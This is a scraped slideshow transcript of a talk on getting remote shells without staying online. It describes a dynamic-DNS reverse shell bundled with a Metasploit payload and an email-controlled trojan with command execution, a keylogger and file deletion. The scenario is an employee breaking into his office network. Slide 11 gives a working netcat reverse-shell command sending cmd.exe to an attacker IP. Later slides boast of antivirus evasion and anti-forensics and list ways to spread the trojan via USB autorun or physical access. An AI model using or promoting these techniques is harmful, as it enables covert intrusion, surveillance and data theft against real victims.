Successfully reported this slideshow.

Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

0

Share

1 of 48
1 of 48

More Related Content

Related Books

Free with a 14 day trial from Scribd

See all

Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

  1. 1. Handle Explotion of Remote System Without Being Online !! By Merchant Bhaumik
  2. 2. Who Am I ? • Currently Helping local law-enforcement And Helping In Securing Some Government Websites • Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection ) • Communicating with Metasploit Guys To Develop Term Called “ Universal Payload”
  3. 3. Presentation Flow……. •Reverse Shell Using Dynamic-Dns Concepts • Getting Data From Victim Computer Using Email Tool
  4. 4. We Will Understand This Mechanism By Considering One Scenario……..
  5. 5. Jack’s Situaion………. Jack Working In A Company ...............! In Which All Computers Behind The NAT BOX……. ………………………! And He Just Decided To Break One Of The System Of His Office And Getting Shell From Office To Home Computer
  6. 6. Problems For Jack…. •Company Has NIDS/IPS ( Network IDS ) ….. So No In Bound Connections…………. •He Don’t Know What IP Address Is Allocated By His ISP •He Can’t Use Any Mechanism Which Constantly Sends Some OutBound Traffic
  7. 7. Good Thing For Jack…. • Jack’s Office Allow Him To Access His Gmail Account..N Allow Some OutBound Traffic..
  8. 8. I # INCLUDE< REVERSE SHELL >
  9. 9. Why Reverse Shell ? •Reverse Shell is one of the powerful method for Bypassing Network Intrusion Detection Systems , Firewalls ( Most Of The) etc • Because Some of this network intrusion only monitors In-bound connection … Not the Out-bound …… • Jack Has DMZ Network In His Office…..
  10. 10. Diagram 1 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  11. 11. Diagram 2 (Normal Attack ! ) 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( Attacker IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 Step I : Start Handler on port 4343 nc –l –p 4343 Victim Step II : nc 49.24.3.12 4343 –e cmd.exe
  12. 12. Normal Flow Of Getting Reverse Shell Exploit ! Attacker Starts Handler Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
  13. 13. But What’s Wrong With Jack? He Don’t Know What IP Address Is Allocated To His Computer ( Dynamic IP Allocation By ISPs)
  14. 14. Solution…. Attacker Is “Offline” But Still He Will Get Reverse Shell
  15. 15. My Way……. Exploit ! Starting Handler On Local Attacker Starts Handler Machine Is Optional ! Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
  16. 16. Flow Of Execution…… Attacker ! Attack Exe Running in Victim Machine * If Attacker is not online still the exe is up and running in Attacker No !! remote machine and Update IP? if attacker updates DNS records… The Yes !! Reverse Shell Is On The Attacker’s Desk !! Attacker Receives Reverse Shell
  17. 17. Mechanism • If the Code ( First Part ) receives positive Acknowledgement of sending packets ………… Jack Will Get Reverse Shell……………. •Else keep running in the victim machine and waits for Ack. From attacker’ machine…
  18. 18. Dynamic DNS Way…. (Initially ! ) • First Part : catchme.dyndns-ip.com ( 255.255.255.255 ) • Second Part : payload.dyndns-ip.com ( 255.255.255.255 ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  19. 19. Dynamic DNS Way…. (Finally ! ) • First Part : catchme.dyndns-ip.com ( 127.0.0.1 ) • Second Part : payload.dyndns-ip.com (Attacker’s IP ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
  20. 20. Metasploit………….!!!!! •You can embed my method (or My Exe ) with metasploit Payload which is of your choice . * The Structure of new Exe will be as per follow : NEW FINAL EXE CONSIS OF My Tool Synchronous Execution MSF PAYLOAD ( Single EXE ) ( LHOST = Dynamic ) New.exe
  21. 21. Hands On NetWork 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
  22. 22. Time To Enjoy Cooked Cookies And Recipes !!
  23. 23. Demo
  24. 24. II # INCLUDE <EMAIL TOOL >
  25. 25. Normal Remote Trojans & Viruses ! Attacker Victim (Must Be Online !) (Must Be Online !)
  26. 26. My Tool !! Caution: No Need To Be Online !! Attackers !! Attacker Victim MAY MAY OR OR MAY NOT ONLINE !! MAY NOT ONLINE !!
  27. 27. So, How It Works ?? Zombie Attacker Victim
  28. 28. But, Who Is Zombie?? @ It may be one of the below : It is one of like it……. Or one like this….. Or like this…….
  29. 29. Features !! Execute Operating System Level Commands By Using Emails ! Get all Network Card Information with Allocated IP Addresses ! Live Tracking Of the System being used by victim ! Get All available account‟ List ! Enable/Disable Key Logger ! This All Stuff With Gmail , Yahoo , Hotmail………!!
  30. 30. About It ! It is a simple application which Once Up & Going on Victim‟ Computer , Attacker can Handle it using Gmail , Yahoo , Hotmail Email Services… There is no need to be Online for Attacker to attack the Victim System….. Attacker Has to send attack instructions to Any of the mail service & then it is like sitting on the door & watching the event , “ when it‟s gonna open !!” As Victim Connects to the internet …. Attack Launches & the results are automatically sent back to the Attacker‟s email Address…..
  31. 31. Cool Benefits !! If the email account is used by using One of like below then it is totally Anti- Forensic ! No Reverse Detection Is Possible ! Create Unique password for all individual victims who are infected … Ability to handle multiple clients simultaneously ….. Delete Files In Victims Computer by Simply Sending An Email.. No Antivirus Can Detect Attack Because Of HTTPS ……
  32. 32. Tool Syntax ….. Password_For_Victim “: “Task_Commands”:” E.g. Pwd$98$ : Account_info : “Pwd$98$” is Password Command Which Sends back For The Particular Email Containing Account Info In Victim… Victim Computer !
  33. 33. Snap Shot 1…(Load Attack Instructions) Password For Individual Victim Send Account info Of Victim.. Send Drive Info Of Victim… Sends Mac , Network card Info...
  34. 34. Snap Shot 2…(Get Back Attack Result) Attached Info Of Victims Computer…! As Per Of Attacker‟ Choice My Emaill Account …… !
  35. 35. Why Gmail ??
  36. 36. No Fear Of Detection 1 No Direct Connection Between Attacker & Victim Attacker Victim
  37. 37. No Fear Of Detection 2 No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct It Self…….!
  38. 38. How To Spread This Code?? Autorun.inf by USB Drives………. Phisical Access Of Victim‟s System….. During Metasploit Explotion ……
  39. 39. Further Possible Development !! This Code Is Flexible Enough To Develop Further By My Hacker Friends….It Is Also Possible For Future To Send Exploits Or Trojans By Using This Code……. Any One Can Send Exploits , Trojans , RootKits , BackDoors By Simply Attaching It With Email And Sending It To His Own Account Or Account That is Configured In Victim‟ Code………
  40. 40. Pros N Cons 1 ! ( Be Transparent !! ) Advantages are that the attacker never goin to caught if he/she using the browser like TOR , Anononymizer , VPNs or Any PROXy…. For accessing the attacking gmail account. No Antivirus can detect the Instruction data because all traffic gonna come from HTTPS …..! Only single email account of gmail goin to use for both the side. Attacker and victim machine both goin to connect same account but attacker knows ,But Victim Don‟t !!
  41. 41. Pros N Cons 2 Disadvantage is that , if the victim has habit of checking the current connections using commands like „netstat –n‟ then possibility to detect Gmail connection when actually there is no browser activity. But still it is difficult to detect ………. Because process is running in Hidden mode….
  42. 42. Hands On Time..! ( Demo)
  43. 43. For More…… backdoor.security@gmail.com
  44. 44. Thanks Guys For Checking It Out …….!

×